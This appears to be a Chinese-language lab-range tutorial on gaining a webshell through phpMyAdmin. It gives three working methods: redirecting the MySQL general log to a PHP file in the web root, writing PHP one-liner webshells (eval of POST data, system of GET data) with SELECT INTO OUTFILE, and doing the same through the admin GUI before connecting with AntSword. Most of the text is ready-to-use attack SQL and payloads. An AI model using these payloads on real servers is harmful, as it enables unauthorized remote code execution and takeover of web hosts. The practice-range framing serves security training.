phpMyAdmin-CMS靶场

1.通过日志文件拿shell

复制代码
show global variables like '%general%';
set global general_log='on'; 
set global general_log_file = 'D:/phpStudy_pro/WWW/muma.php';
show global variables like '%general%';
select '<?php eval($_POST["admin"]);?>';
select+'<?php+phpinfo();+?>'
select+'<?php+//%0Aphpinfo();+?>'

查看日志目录路径

复制代码
show global variables like '%general%';

打开日志功能

复制代码
set global general_log='on'; 

最右边有个执行按钮,可以执行

设置日志文件目录,创建php日志文件

复制代码
set global general_log_file='D:/phpStudy_pro/WWW/9.php';

查看自己创建的日志文件

复制代码
show global variables like '%general%';

可以写入一句话木马用蚁剑连接

2. 上传日志文件拿shell

复制代码
1.⾸先判断mysql位置
select @@datadir
路径:C:\phpStudy\MySQL\data\
2.猜测web路径
猜测web路径:C:\phpStudy\www
C:\phpStudy\WWW\web.php
3.写webshell
select "<?php eval($_POST[a]);?>" into outfile 'c:/phpstudy/www/b.php';
select "<?php system($_GET[a]);?>" into outfile 'c:/phpstudy/PHPTutorial/w
ww/d.php';
4.浏览器
http://192.168.2.8/d.php?a=dir ..\
select "<?php phpinfo();eval($_POST[a]);?>" into outfile 'C:\phpStudy\WWW
\web.php';
备注:/
不要⽤\,如⾥要⽤\\(转义)

和第一个一样,写入一句话木马,用蚁剑连接

3界面图像化GetShell

(如果过滤了into outfile 第一种的图形化操作)

复制代码
phpmyadmin管理台
变量:日志 搜索:gen
log:on
file:C:\phpStudy\PHPTutorial\www\c.php
sql:
select "<?php eval($_POST[a]);?>";

写入一句话木马

用蚁剑连接

相关推荐
私人珍藏库6 分钟前
[Android] 聊天记录微备份 -聊天记录备份+本地数据备份
android·人工智能·app·软件·多功能
私人珍藏库2 小时前
[Android] PocketPal -本地离线AI助手+大模型部署神器
android·人工智能·app·软件·多功能
listening7772 小时前
HarmonyOS 6.1 跨端实战:用ArkUI-X把电商App同时跑在Android/iOS上
android·ios·harmonyos
爱笑鱼2 小时前
Handler(三):主线程、HandlerThread、Binder 线程到底怎么区分?
android
w139548564222 小时前
鸿蒙实战:报告与雷达图 ReportDao
android·华为·harmonyos·鸿蒙系统
爱笑鱼3 小时前
Handler(二):MessageQueue 为什么不是普通队列?
android
阿巴斯甜3 小时前
Android Studio 新版 Logcat
android
监督者修3 小时前
从零构建 GIS 数据引擎:方案驱动架构的设计与实践
android·架构·kotlin
Yoke3 小时前
从零到三端:用 Kotlin Multiplatform + Compose 构建跨平台财务追踪应用
android
gxgldyh3 小时前
Android Framework源码解析(六):Launcher3 启动流程详解——AMS 如何拉起系统桌面?
android